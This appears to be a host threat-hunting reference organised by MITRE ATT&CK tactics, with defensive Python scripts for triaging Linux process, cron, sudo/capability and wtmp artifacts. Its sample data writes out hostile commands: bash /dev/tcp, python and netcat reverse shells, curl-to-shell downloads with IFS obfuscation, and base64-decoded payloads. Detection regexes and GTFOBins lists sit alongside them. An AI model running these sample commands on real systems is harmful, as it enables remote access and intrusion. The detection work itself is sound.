MITRE ATT&CK Host Analyst Reference
Host analyst threat hunting: indicators, detection syntax, and APT attribution across the attack lifecycle
Tactics
TA0002
44 indicators · 18 techniques · WIN + LINUX
Execution
Code execution via interpreters and signed binaries. Windows (32): PowerShell, cmd, VBScript, JScript, WMI, scheduled tasks, service execution, mshta, rundll32, regsvr32, Native API, DLL side-loading, user execution. Linux (12): T1059.004 Unix Shell (curl|bash, reverse shells, service-spawned shells, HISTFILE/IFS obfuscation, SUID interpreters), T1059.006 Python (-c reverse shells, pty.spawn, sitecustomize/PYTHONSTARTUP), T1106 Native API fileless execution (memfd_create) and T1574.006 preload-based execution (LD_PRELOAD, ld.so.preload), T1053.003 Cron (crontab/cron.d) and T1053.006 Systemd Timers, T1059 Perl one-liners, T1609 Container Administration Command (docker/kubectl/nsenter exec).
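The Linux execution indicators above come down to what can be read off a single process-creation record once the command line is normalised. The following is an added example, not code from this reference: it takes Sysmon for Linux EID 1 records as plain dicts, undoes ${IFS} and quote-splitting obfuscation, then applies content rules for pipe-to-shell, /dev/tcp and netcat reverse shells, history suppression and python -c pty/socket shells, plus a parent-child rule for shells spawned by service daemons. The sample events, the SERVICE_PARENTS list and the rule patterns are assumptions to tune locally.

```python
"""Triage Linux process-creation events for T1059.004 / T1059.006 indicators.

Added example for this page, not code from the reference itself. Each event
is a dict carrying Sysmon for Linux EID 1 field names (ProcessId, Image,
ParentImage, CommandLine); SAMPLE_EVENTS are constructed, not captured.
"""
import os
import re

# Shell one-liner obfuscation: ${IFS} / $IFS standing in for spaces, and quote
# splitting inside a word (cu"r"l, c''url). Normalising first lets the content
# rules match the real command instead of every spelling of it.
IFS_RE = re.compile(r"\$\{?IFS\}?")
SPLIT_QUOTE_RE = re.compile(r"(?<=\w)[\"']+(?=\w)")


def normalize(cmdline: str) -> str:
    s = IFS_RE.sub(" ", cmdline)
    s = SPLIT_QUOTE_RE.sub("", s)
    return re.sub(r"\s+", " ", s).strip()


# (label, pattern) pairs applied to the normalised command line.
RULES = [
    ("T1059.004 download piped to shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|da|z|k)?sh\b")),
    ("T1059.004 /dev/tcp reverse shell",
     re.compile(r"/dev/(tcp|udp)/\S+")),
    ("T1059.004 netcat -e reverse shell",
     re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s")),
    ("T1059.004 history suppression",
     re.compile(r"HISTFILE=/dev/null|\bunset\s+HISTFILE\b|\bset\s+\+o\s+history\b|\bHISTSIZE=0\b")),
    ("T1059.006 python -c socket/pty shell",
     re.compile(r"\bpython[23]?(\.\d+)?\b.*\s-c\s.*\b(pty\.spawn|socket\.socket)\b")),
    ("T1059.006 python startup hook",
     re.compile(r"PYTHONSTARTUP=|sitecustomize")),
]

# Daemons that have no business spawning a shell; a shell child of one of these
# is the service-spawned-shell (web shell / RCE) pattern. Assumed list.
SERVICE_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "java", "node",
                   "tomcat", "postgres", "mysqld", "redis-server", "mongod"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}


def triage(event: dict) -> dict:
    raw = event["CommandLine"]
    norm = normalize(raw)
    hits = [label for label, rx in RULES if rx.search(norm)]
    if IFS_RE.search(raw) or SPLIT_QUOTE_RE.search(raw):
        hits.append("obfuscated command line (IFS / quote splitting)")
    image = os.path.basename(event["Image"])
    parent = os.path.basename(event.get("ParentImage", ""))
    if image in SHELLS and parent in SERVICE_PARENTS:
        hits.append(f"T1059.004 shell spawned by service process ({parent})")
    return {"ProcessId": event["ProcessId"], "normalized": norm, "hits": hits}


def triage_events(events: list) -> list:
    """Return the triage records of events that matched at least one rule."""
    return [r for r in (triage(e) for e in events) if r["hits"]]


# Constructed sample: four hostile and one benign process creation.
SAMPLE_EVENTS = [
    {"ProcessId": 4121, "Image": "/usr/bin/bash", "ParentImage": "/usr/sbin/apache2",
     "CommandLine": 'bash -c "bash -i >& /dev/tcp/203.0.113.7/4444 0>&1"'},
    {"ProcessId": 4122, "Image": "/usr/bin/bash", "ParentImage": "/usr/bin/bash",
     "CommandLine": "bash -c 'cu\"r\"l${IFS}http://203.0.113.7/s.sh${IFS}|${IFS}bash'"},
    {"ProcessId": 4123, "Image": "/usr/bin/python3", "ParentImage": "/usr/bin/bash",
     "CommandLine": "python3 -c 'import socket,pty;s=socket.socket();"
                    "s.connect((\"203.0.113.7\",4444));pty.spawn(\"/bin/bash\")'"},
    {"ProcessId": 4124, "Image": "/usr/bin/bash", "ParentImage": "/usr/sbin/sshd",
     "CommandLine": "bash -c 'unset HISTFILE; nc -e /bin/sh 203.0.113.7 4444'"},
    {"ProcessId": 4130, "Image": "/usr/bin/bash", "ParentImage": "/usr/sbin/sshd",
     "CommandLine": 'bash -c "ls -la /var/log"'},
]

if __name__ == "__main__":
    for r in triage_events(SAMPLE_EVENTS):
        print(r["ProcessId"], r["normalized"], "->", "; ".join(r["hits"]))
```

Run it as a script to see the flagged events, or import triage_events into a log pipeline. The normalisation step is what earns its keep: without it a rule written for curl|bash never sees cu"r"l${IFS}http://..., which is exactly why the HISTFILE/IFS row exists.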
TA0003
28 indicators · 16 techniques · WIN + LINUX
Persistence
Mechanisms ensuring adversary access survives reboots and logouts. Windows (20): T1547.001 Registry Run Keys / Startup Folder (3), T1546.003 WMI Subscription Persistence Hunt (2), T1543.003 Windows Service Persistence Hunt (3), T1053.005 Scheduled Task Persistence Angle (2), T1547.009 Shortcut Modification (2), T1037 Boot/Logon Init Scripts including GPO logon scripts (2), T1098 Account Manipulation - group changes and password resets (2), T1136 Create Account - local and domain (2), T1546.015 COM Hijacking - HKCU shadow and phantom/TreatAs variants (2). Linux (8): T1053.003 Cron jobs (2), T1543.002 systemd service units (1), T1546.004 Unix shell rc/profile (1), T1098.004 SSH authorized_keys (1), T1547.006 kernel modules / LKM (1), T1556.003 PAM backdoor (1), T1037.004 RC init scripts (1). Cross-cited techniques from Execution are built with persistence-hunting-specific indicators rather than duplicating Execution coverage.
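Cron is the most common of the Linux persistence mechanisms listed, and the two crontab layouts trip up ad-hoc greps: system tables carry a user column, per-user tables do not, and @reboot lines have no time fields. Added example, not the reference's own hunt script: a parser for both layouts plus triage heuristics for staging directories, hidden paths, download-and-execute, base64 payloads and reverse shells, with @reboot and every-minute schedules reported as context. The crontab contents and the heuristics are constructed and assumed.

```python
"""Triage cron persistence artifacts (T1053.003).

Added example for this page, not the reference's own hunt script. It parses
both crontab layouts (per-user: five time fields + command; /etc/crontab and
/etc/cron.d: five time fields + user + command), handles @reboot-style
specials, environment assignments and comments, and flags the entries a
hunter would pull first. The crontab text below is constructed.
"""
import re
from dataclasses import dataclass, field

SPECIALS = {"@reboot", "@yearly", "@annually", "@monthly", "@weekly",
            "@daily", "@midnight", "@hourly"}
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


@dataclass
class CronEntry:
    source: str
    line_no: int
    schedule: str
    user: str
    command: str
    flags: list = field(default_factory=list)


def parse_crontab(text: str, source: str, system_table: bool, owner: str = "") -> list:
    """system_table=True for /etc/crontab and /etc/cron.d/* (extra user column)."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue                                  # blank, comment, SHELL=/PATH=/MAILTO=
        if line.startswith("@"):
            parts = line.split(None, 2 if system_table else 1)
            if parts[0] not in SPECIALS or len(parts) < (3 if system_table else 2):
                continue                              # malformed special line
            schedule, rest = parts[0], parts[1:]
        else:
            parts = line.split(None, 6 if system_table else 5)
            if len(parts) < (7 if system_table else 6):
                continue                              # too few fields for this layout
            schedule, rest = " ".join(parts[:5]), parts[5:]
        user, command = (rest[0], rest[1]) if system_table else (owner, rest[0])
        entries.append(CronEntry(source, n, schedule, user, command))
    return entries


# Strong indicators in the command; weak ones only add context to a strong hit.
STRONG = [
    ("runs from world-writable or staging dir",
     re.compile(r"(^|[\s=;|&'\"])(/tmp|/var/tmp|/dev/shm)/")),
    ("runs from hidden path", re.compile(r"/\.(?!\.)[^/\s]+(?=/|\s|$)")),
    ("download piped to shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|da|z|k)?sh\b")),
    ("base64-decoded payload", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("reverse shell / raw socket", re.compile(r"/dev/tcp/|\b(nc|ncat)\b.*\s-e\s")),
]
WEAK = [("output discarded", re.compile(r">\s*/dev/null\s+2>&1"))]


def triage(entries: list) -> list:
    """Return entries with at least one strong flag; weak flags ride along."""
    flagged = []
    for e in entries:
        strong = [label for label, rx in STRONG if rx.search(e.command)]
        weak = [label for label, rx in WEAK if rx.search(e.command)]
        if e.schedule == "@reboot":
            weak.append("@reboot schedule")
        elif e.schedule == "* * * * *":
            weak.append("every-minute schedule")
        if strong:
            e.flags = strong + weak
            flagged.append(e)
    return flagged


# Constructed samples in the two layouts.
SYSTEM_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 *   * * *   root    /bin/sh -c "curl -s http://203.0.113.7/c | sh" > /dev/null 2>&1
@reboot         root    /dev/shm/.cache/kworkerd > /dev/null 2>&1
"""
USER_CRONTAB = """\
# nightly backup
0 2 * * * /usr/local/bin/backup.sh
* * * * * echo aWQgPiAvdG1wL3gK | base64 -d | sh
"""


def hunt() -> list:
    entries = parse_crontab(SYSTEM_CRONTAB, "/etc/crontab", system_table=True)
    entries += parse_crontab(USER_CRONTAB, "/var/spool/cron/crontabs/www-data",
                             system_table=False, owner="www-data")
    return triage(entries)


if __name__ == "__main__":
    for e in hunt():
        print(f"{e.source}:{e.line_no} [{e.user}] {e.schedule} {e.command}\n    {', '.join(e.flags)}")
```

On a live host, feed parse_crontab the contents of /etc/crontab, each file in /etc/cron.d (system_table=True) and each file under /var/spool/cron (system_table=False, owner from the file name); the per-user spool is root-only, so run the collection with privilege.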
TA0004
30 indicators · 16 techniques · WIN + LINUX
Privilege Escalation
Elevating from user to admin/SYSTEM/root. Windows (21): UAC bypass (T1548.002, 3), token manipulation incl. Potato + SID-history (T1134/.005, 3), process injection - remote-thread/hollowing/thread-hijack (T1055, 3), exploitation incl. BYOVD (T1068 win, 2), service registry/path/permission weaknesses (T1574.011/.005, 3), DLL search-order hijack priv-esc angle (T1574.001, 1), accessibility & IFEO triggered execution (T1546.008/.012, 2), GPO & domain-trust modification (T1484.001/.002, 2), container escape (T1611 win, 1), account manipulation / AdminSDHolder (T1098, 1). Linux (9): T1548.001 setuid/setgid + GTFOBins + Linux capabilities (2), T1548.003 sudo misconfig + sudo CVEs incl. Baron Samedit (CVE-2021-3156) (2), T1068 pkexec PwnKit (CVE-2021-4034), the Dirty Pipe (CVE-2022-0847) and Dirty COW (CVE-2016-5195) kernel exploits, and the glibc ld.so Looney Tunables bug (CVE-2023-4911) (2), T1611 privileged container / docker.sock / runc / cgroups escape (2), T1574.006 dynamic linker hijack via LD_PRELOAD/ld.so.preload (1).
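For the Linux sudo and setuid/capability rows the raw material is the output of `sudo -l` and `getcap -r /`. Added example, not the reference's own script: parsers for both formats and the checks a hunter applies to them (unrestricted ALL, GTFOBins binaries, wildcards in permitted arguments, the SETENV tag, and capabilities such as cap_setuid or cap_sys_ptrace on any binary). The command outputs are constructed and the GTFOBins set is a hand-picked subset, not the project's full index.

```python
"""Triage `sudo -l` and `getcap -r /` output for T1548.003 / T1548.001 paths.

Added example for this page, not the reference's own hunt script. Both
outputs below are constructed to mirror the real tools' formats (getcap
prints "path cap=ep" on current libcap and "path = cap+ep" on older ones).
GTFOBINS here is a short hand-picked subset, not the project's full index.
"""
import os
import re

GTFOBINS = {"vim", "vi", "nano", "less", "more", "man", "find", "awk", "python",
            "python3", "perl", "ruby", "tar", "zip", "env", "bash", "sh", "tee",
            "cp", "mv", "dd", "git", "nmap"}

# Capabilities that reach root or root-equivalent on their own.
DANGEROUS_CAPS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
                  "cap_dac_override", "cap_dac_read_search", "cap_sys_module",
                  "cap_chown", "cap_fowner"}

SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.*\S)\s*$")
CAP_LINE_RE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>\S+)$")


def parse_sudo_l(output: str) -> list:
    """Return (runas, tags, command) per permitted command in `sudo -l` output."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = SUDO_RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = [t.rstrip(":") for t in m["tags"].split()]
        # one sudoers line may list several commands separated by ", "
        for cmd in re.split(r",\s*(?=/|ALL\b|!)", m["cmds"]):
            rules.append((m["runas"].strip(), tags, cmd.strip()))
    return rules


def sudo_findings(output: str) -> list:
    findings = []
    for runas, tags, cmd in parse_sudo_l(output):
        prog = os.path.basename(cmd.split()[0])
        reasons = []
        if cmd == "ALL":
            reasons.append("unrestricted sudo")
        elif prog in GTFOBINS:
            reasons.append(f"GTFOBins binary {prog}")
        if "*" in cmd:
            reasons.append("wildcard in permitted arguments")
        if "SETENV" in tags:
            reasons.append("SETENV (caller may inject LD_PRELOAD/PATH)")
        if reasons:                     # NOPASSWD alone is not a path, only a multiplier
            if "NOPASSWD" in tags:
                reasons.append("NOPASSWD")
            findings.append((runas, cmd, reasons))
    return findings


def cap_findings(output: str) -> list:
    findings = []
    for line in output.splitlines():
        m = CAP_LINE_RE.match(line.strip())
        if not m:
            continue
        caps = re.split(r"[=+]", m["caps"])[0].split(",")   # drop the =ep / +eip flag set
        bad = [c for c in caps if c in DANGEROUS_CAPS]
        if bad:
            findings.append((m["path"], bad))
    return findings


# Constructed outputs.
SUDO_L = """\
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
    (root) NOPASSWD: /usr/bin/vim, /usr/bin/less
    (root) /usr/bin/tar -czf /backup/*.tgz /var/www
    (ALL : ALL) SETENV: /opt/deploy/run.sh
"""
GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/python3.10 = cap_setuid+ep
/usr/local/bin/agent cap_dac_read_search,cap_sys_ptrace=eip
"""

if __name__ == "__main__":
    for runas, cmd, reasons in sudo_findings(SUDO_L):
        print(f"sudo ({runas}) {cmd}: {', '.join(reasons)}")
    for path, caps in cap_findings(GETCAP):
        print(f"capability {path}: {', '.join(caps)}")
```

The systemctl entry is deliberately left alone: NOPASSWD on a fixed, argument-complete command is not itself an escalation path, whereas NOPASSWD on vim or a wildcard in tar's argument list is, and the SETENV tag lets the caller pass environment variables that sudo would otherwise strip.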
TA0005
16 indicators · 11 techniques · LINUX
Defense Evasion
Subverting and blinding host defenses and removing evidence of intrusion. Linux coverage complete (16): T1070 Indicator Removal - .003 clear command history, .002 clear system logs plus utmp/wtmp/btmp/lastlog login-record tampering, .006 timestomp, .004 file deletion plus /proc self-delete recovery. T1562 Impair Defenses - .012 disable the Linux audit system, .001 disable security agents plus SELinux/AppArmor plus the Alibaba/Tencent cloud-agent uninstall TTP, .004 disable or flush the host firewall, .006 indicator blocking. T1014 Rootkit - LKM, userland LD_PRELOAD, and eBPF, hunted by discrepancy checks, dynamic-vs-static differential, and bpftool inventory. T1036 Masquerading - .005 fake kernel threads and system-binary name/location impersonation, .004 task/service masquerade. Windows coverage is underway: T1070.001 clear event logs, T1562.001 Defender tampering, plus in-memory AMSI bypass and ETW patching, T1112 modify registry, plus the LOLBin proxy-execution set where signed trusted binaries make signature allow-listing useless and detection lives in command line, parent-child, and egress: T1218.011 rundll32 (DLL exports, the blank-command-line injection host, and comsvcs MiniDump against LSASS), T1218.010 regsvr32 Squiblydoo, T1218.005 mshta, T1218.004 InstallUtil, T1127.001 MSBuild, and T1218.007 msiexec.
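The T1070.002 login-record row covers utmp/wtmp/btmp tampering. The usual wipers zero a record in place or rewrite its fields, and `last` ignores EMPTY records, so a zeroed entry simply vanishes from its output. Added example, not the reference's own hunt script: a `struct utmp` parser for the glibc x86-64 layout that reports zeroed records, USER_PROCESS entries with a blank user, and timestamps that step backwards in an append-only log. The wtmp blob is built from constructed records; pass /var/log/wtmp as an argument to run it against a real file.

```python
"""Hunt for login-record tampering in wtmp/btmp/utmp (T1070.002).

Added example for this page, not the reference's own hunt script. It parses
the glibc x86-64 `struct utmp` layout (384-byte records; aarch64 matches,
other ABIs may not) and reports what in-place wipers leave behind: records
zeroed between live ones, USER_PROCESS entries with a blanked user field,
and timestamps that step backwards in an append-only file. The wtmp blob is
built here from constructed records, not captured from a host.
"""
import struct
import sys

# struct utmp: short ut_type; (pad) pid_t ut_pid; char ut_line[32]; char ut_id[4];
# char ut_user[32]; char ut_host[256]; short e_termination, e_exit; int32 ut_session;
# int32 tv_sec, tv_usec; int32 ut_addr_v6[4]; char unused[20]  -> 384 bytes.
UTMP_FMT = "<h2xi32s4s32s256shhiii4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FMT)
EMPTY, BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 0, 2, 7, 8


def _cstr(b: bytes) -> str:
    return b.split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_utmp(blob: bytes) -> list:
    if len(blob) % UTMP_SIZE:
        raise ValueError("size is not a multiple of 384: truncated file or a different ABI")
    records = []
    for i, off in enumerate(range(0, len(blob), UTMP_SIZE)):
        f = struct.unpack_from(UTMP_FMT, blob, off)
        records.append({
            "index": i, "type": f[0], "pid": f[1], "line": _cstr(f[2]),
            "user": _cstr(f[4]), "host": _cstr(f[5]), "time": f[9],
            "zeroed": blob[off:off + UTMP_SIZE] == b"\0" * UTMP_SIZE,
        })
    return records


def hunt(records: list) -> list:
    """Return (record index, reason) for every tampering artefact found."""
    findings, last_time = [], 0
    for r in records:
        if r["zeroed"]:
            # wtmp/btmp are append-only logs: an all-zero record has no legitimate
            # origin there. In utmp (live sessions) this check is noisier.
            findings.append((r["index"], "zeroed record (entry wiped in place)"))
            continue
        if r["type"] in (BOOT_TIME, USER_PROCESS, DEAD_PROCESS):
            if r["time"] < last_time:
                findings.append((r["index"], f"timestamp steps back {last_time - r['time']}s (record inserted or edited)"))
            last_time = max(last_time, r["time"])
        if r["type"] == USER_PROCESS and not r["user"]:
            findings.append((r["index"], "USER_PROCESS with blank ut_user (fields cleared in place)"))
    return findings


def make_record(ut_type: int, pid: int, line: str, user: str, host: str, tv_sec: int) -> bytes:
    """Pack one constructed utmp record."""
    def pad(s, n):
        return s.encode()[:n].ljust(n, b"\0")
    return struct.pack(UTMP_FMT, ut_type, pid, pad(line, 32), pad(line[-4:], 4),
                       pad(user, 32), pad(host, 256), 0, 0, 0, tv_sec, 0,
                       0, 0, 0, 0, b"\0" * 20)


def build_sample_wtmp() -> bytes:
    """Constructed wtmp: one wiped record, one out-of-order record, one blanked user."""
    t0 = 1_700_000_000
    return b"".join([
        make_record(BOOT_TIME, 0, "~", "reboot", "6.5.0-generic", t0),
        make_record(USER_PROCESS, 1201, "pts/0", "alice", "10.0.0.20", t0 + 60),
        make_record(USER_PROCESS, 1300, "pts/1", "bob", "10.0.0.21", t0 + 120),
        b"\0" * UTMP_SIZE,                                                          # login zeroed out
        make_record(DEAD_PROCESS, 1300, "pts/1", "", "", t0 + 300),
        make_record(USER_PROCESS, 1450, "pts/2", "alice", "10.0.0.20", t0 + 200),  # out of order
        make_record(USER_PROCESS, 1500, "pts/3", "", "203.0.113.7", t0 + 400),     # user blanked
    ])


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_wtmp()
    for idx, reason in hunt(parse_utmp(blob)):
        print(f"record {idx}: {reason}")
```

A file whose size is not a multiple of 384 is itself a finding worth noting (truncation, or a non-glibc layout), which is why parse_utmp refuses it rather than silently dropping the tail; the backwards-timestamp check assumes a single host's clock, so correlate with the BOOT_TIME records before treating a small step as tampering.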
TA0006
Planned
Credential Access
LSASS access patterns, SAM/NTDS extraction, DPAPI abuse, Mimikatz process indicators. Host-side complement to network credential access detections.
TA0007
Planned
Discovery
Host enumeration commands, registry queries, network/system discovery. Complements network-side discovery detections.
About this reference

What this is

The host-side companion to the network threat hunt reference. Where the network reference covers what adversaries do across the wire, this site covers what they do inside the endpoint: process execution, persistence, privilege escalation, host-side credential theft.

Covers both Windows and Linux endpoints. Each indicator is tagged WIN or LINUX; use the OS filter in any tactic header to narrow to one platform, or leave it off to see both. Windows rows lead with Sysmon / PowerShell / registry; Linux rows lead with Sysmon for Linux / auditd / shell, with file artifacts in place of registry.

Each indicator includes detection telemetry, paste-ready Kibana KQL, hunt scripts, file/registry artifacts, adversary tool attribution, and references to open-source detection projects (Sigma, Velociraptor, Hayabusa, Falco, etc.).

How to use it

  • Pick a tactic card to open its reference page
  • Search or filter to narrow indicators by technique or APT actor
  • Each row has tabs for Sysmon · Kibana · PowerShell · Registry/Artifacts · Tools · OSS Detections · Notes · APT
  • Click the ★ star to add to your hunt list (persisted across sessions)
  • Open My Hunts to review and export your hunt as TXT or CSV. A per-technique case template is also available on each row for structured note-taking.
Use the NETWORK / HOST switcher in the header to jump to the network reference for the complementary lens on the same techniques.

Schema notes

The host schema differs from network because host telemetry has more dimensions. The same indicator can have evidence in several Sysmon event types: process creation (EID 1), registry key create/delete and value set (EID 12/13), file creation (EID 11), network connections from the process (EID 3), image loads (EID 7), and process access (EID 10).

PowerShell hunt scripts are designed to run directly against Windows event logs - useful for both proactive hunting and during incident response when you need to triage without a SIEM.

Current Build Status

Execution (TA0002), Persistence (TA0003), and Privilege Escalation (TA0004) complete.

Defense Evasion (TA0005) in progress: the Linux build is complete with 16 indicators across 11 sub-techniques; Windows indicators are underway.

Tactic build order:
→Execution (complete)
→Persistence (complete)
→Privilege Escalation (complete)
→Defense Evasion (in progress)
→Credential Access (planned)
→Discovery (planned)
then completionist coverage of the rest.